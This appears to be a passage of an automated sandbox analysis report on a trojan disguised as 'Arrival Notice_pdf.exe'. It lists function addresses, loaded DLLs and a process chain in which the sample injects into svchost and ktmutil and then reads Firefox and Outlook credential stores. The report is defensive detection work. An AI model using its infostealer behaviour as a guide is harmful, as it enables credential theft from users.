Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFEEDB	1_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFEE26	1_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40E59	1_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B58DBF	1_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3ADE0	1_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDCD1F	1_2_03BDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4AD00	1_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0CB5	1_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30CF2	1_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40C00	1_2_03B40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B8739A	1_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF132D	1_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2D34C	1_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B452A0	1_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5D2F0	1_2_03B5D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B2C0	1_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4B1B0	1_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0B16B	1_2_03C0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7516C	1_2_03B7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF70E9	1_2_03BF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFF0E0	1_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEF0CC	1_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFF7B0	1_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF16CC	1_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B85630	1_2_03B85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C095C3	1_2_03C095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDD5B0	1_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF7571	1_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFF43F	1_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B31460	1_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5FB80	1_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB5BF0	1_2_03BB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7DBF9	1_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFB76	1_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDDAAC	1_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B85AA0	1_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE1AA3	1_2_03BE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEDAC6	1_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB3A6C	1_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFA49	1_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF7A46	1_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD5910	1_2_03BD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B49950	1_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B950	1_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B438E0	1_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAD800	1_2_03BAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFFB1	1_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41F92	1_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B03FD2	1_2_03B03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B03FD5	1_2_03B03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFF09	1_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B49EB0	1_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5FDC0	1_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF7D73	1_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF1D5A	1_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B43D40	1_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFCF2	1_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB9C32	1_2_03BB9C32
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C803E6	7_2_03C803E6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BCE3F0	7_2_03BCE3F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7A352	7_2_03C7A352
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C402C0	7_2_03C402C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C60274	7_2_03C60274
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C781CC	7_2_03C781CC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C801AA	7_2_03C801AA
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C741A2	7_2_03C741A2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C48158	7_2_03C48158
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BB0100	7_2_03BB0100
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C5A118	7_2_03C5A118
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C52000	7_2_03C52000
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BBC7C0	7_2_03BBC7C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC0770	7_2_03BC0770
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BE4750	7_2_03BE4750
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BDC6E0	7_2_03BDC6E0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C80591	7_2_03C80591
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC0535	7_2_03BC0535
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C6E4F6	7_2_03C6E4F6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C72446	7_2_03C72446
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C64420	7_2_03C64420
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C76BD7	7_2_03C76BD7
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7AB40	7_2_03C7AB40
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BBEA80	7_2_03BBEA80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC29A0	7_2_03BC29A0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C8A9A6	7_2_03C8A9A6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BD6962	7_2_03BD6962
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BA68B8	7_2_03BA68B8
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BEE8F0	7_2_03BEE8F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC2840	7_2_03BC2840
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BCA840	7_2_03BCA840
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C3EFA0	7_2_03C3EFA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BB2FC8	7_2_03BB2FC8
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C34F40	7_2_03C34F40
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BE0F30	7_2_03BE0F30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C02F28	7_2_03C02F28
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C62F30	7_2_03C62F30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7EEDB	7_2_03C7EEDB
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BD2E90	7_2_03BD2E90
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7CE93	7_2_03C7CE93
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7EE26	7_2_03C7EE26
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC0E59	7_2_03BC0E59
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BD8DBF	7_2_03BD8DBF
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BBADE0	7_2_03BBADE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BCAD00	7_2_03BCAD00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C5CD1F	7_2_03C5CD1F
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BB0CF2	7_2_03BB0CF2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C60CB5	7_2_03C60CB5
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC0C00	7_2_03BC0C00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C0739A	7_2_03C0739A
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7132D	7_2_03C7132D
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BAD34C	7_2_03BAD34C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC52A0	7_2_03BC52A0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C612ED	7_2_03C612ED
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BDD2F0	7_2_03BDD2F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BDB2C0	7_2_03BDB2C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BCB1B0	7_2_03BCB1B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C8B16B	7_2_03C8B16B
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BAF172	7_2_03BAF172
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BF516C	7_2_03BF516C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C6F0CC	7_2_03C6F0CC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7F0E0	7_2_03C7F0E0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C770E9	7_2_03C770E9
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC70C0	7_2_03BC70C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7F7B0	7_2_03C7F7B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C716CC	7_2_03C716CC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C05630	7_2_03C05630
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C895C3	7_2_03C895C3
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C5D5B0	7_2_03C5D5B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C77571	7_2_03C77571
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BB1460	7_2_03BB1460
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7F43F	7_2_03C7F43F
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C35BF0	7_2_03C35BF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BDFB80	7_2_03BDFB80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BFDBF9	7_2_03BFDBF9
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7FB76	7_2_03C7FB76
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C6DAC6	7_2_03C6DAC6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C05AA0	7_2_03C05AA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C61AA3	7_2_03C61AA3
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C5DAAC	7_2_03C5DAAC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C77A46	7_2_03C77A46
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7FA49	7_2_03C7FA49
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C33A6C	7_2_03C33A6C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C55910	7_2_03C55910
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC9950	7_2_03BC9950
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BDB950	7_2_03BDB950
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC38E0	7_2_03BC38E0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C2D800	7_2_03C2D800
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC1F92	7_2_03BC1F92
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03B83FD2	7_2_03B83FD2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03B83FD5	7_2_03B83FD5
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7FFB1	7_2_03C7FFB1
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7FF09	7_2_03C7FF09
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC9EB0	7_2_03BC9EB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BDFDC0	7_2_03BDFDC0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C71D5A	7_2_03C71D5A
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C77D73	7_2_03C77D73
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BC3D40	7_2_03BC3D40
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C7FCF2	7_2_03C7FCF2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03C39C32	7_2_03C39C32
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032B1FB0	7_2_032B1FB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032ACEE7	7_2_032ACEE7
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032ACEF0	7_2_032ACEF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032AD110	7_2_032AD110
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032AB188	7_2_032AB188
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032AB190	7_2_032AB190
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032B5610	7_2_032B5610
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032CBBC0	7_2_032CBBC0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032B3850	7_2_032B3850
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_038DE344	7_2_038DE344
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_038DE463	7_2_038DE463
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_038DCA9B	7_2_038DCA9B
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_038DD8C8	7_2_038DD8C8
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_038DE805	7_2_038DE805

Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 03C2EA12 appears 86 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 03C3F290 appears 103 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 03BF5130 appears 58 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 03C07E54 appears 107 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 03BAB970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BBF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B2B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B87E54 appears 107 times
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: String function: 0026F8A0 appears 35 times
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: String function: 00266AC0 appears 42 times
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: String function: 0025EC2F appears 68 times

Source: Arrival Notice_pdf.exe, 00000000.00000003.1783754055.0000000003643000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice_pdf.exe
Source: Arrival Notice_pdf.exe, 00000000.00000003.1784514568.00000000037ED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice_pdf.exe

Source: Arrival Notice_pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/3@7/4

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0028CE7A GetLastError,FormatMessageW,

0_2_0028CE7A

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0027AB84 AdjustTokenPrivileges,CloseHandle,		0_2_0027AB84
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0027B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_0027B134

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0028E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0028E1FD

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00286532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00286532

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0029C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_0029C18C

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0024406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0024406B

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\aut65C5.tmp

Jump to behavior

Source: Arrival Notice_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ktmutil.exe, 00000007.00000003.2311725673.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3006642463.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.2316979640.00000000035C3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Arrival Notice_pdf.exe	ReversingLabs: Detection: 26%
Source: Arrival Notice_pdf.exe	Virustotal: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\Arrival Notice_pdf.exe "C:\Users\user\Desktop\Arrival Notice_pdf.exe"
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice_pdf.exe"
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
Source: C:\Windows\SysWOW64\ktmutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice_pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\ktmutil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\ktmutil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Arrival Notice_pdf.exe

Static file information: File size 1223168 > 1048576

